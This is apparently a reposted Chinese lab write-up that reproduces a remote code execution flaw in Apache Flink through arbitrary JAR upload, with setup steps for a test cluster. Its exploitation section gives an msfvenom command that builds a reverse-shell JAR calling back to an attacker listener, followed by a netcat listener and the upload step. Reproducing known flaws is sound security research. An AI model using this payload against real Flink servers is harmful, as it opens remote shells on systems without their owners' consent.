Apache Flink任意Jar包上傳導致遠程代碼執行漏洞復現


0x00 簡介

  Apache Flink是由Apache軟件基金會開發的開源流處理框架,其核心是用Java和Scala編寫的分布式流數據流引擎。Flink以數據並行和流水線方式執行任意流數據程序,Flink的流水線運行時系統可以執行批處理和流處理程序。

0x01 漏洞概述

  近日,有安全研究員公開了一個Apache Flink的任意Jar包上傳導致遠程代碼執行的漏洞。攻擊者只需要自己定制一個惡意jar上傳,即可達到攻擊目的。

0x02 影響版本

  <= 1.9.1(最新版本)

0x03 環境搭建

    鏡像下載地址:

  https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

  下載好后進入bin文件夾。執行./start-cluster.sh

   

  訪問http://ip:8081可看到環境頁面

  

0x04 漏洞利用

  1.使用msfvenom生成jar包 

  msfvenom -p java/shell_reverse_tcp LHOST=192.168.217.1 LPORT=6666 -f jar >shell.jar

   

  2.nc監聽6666端口

   

  3.上傳生成的jar包

   

 

   

  Submit后,成功反彈shell

   

  

參考鏈接

https://mp.weixin.qq.com/s/ArYCF4jjhy6nkY4ypib-Ag

https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483983&idx=1&sn=3dfebb1f2289549a71e821dd977ea3dc&chksm=903924bfa74eada98ed00863e8893c79cd94f5831c4fe51acaae838b6592e75dad88d9f17e6a&scene=21#wechat_redirect


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM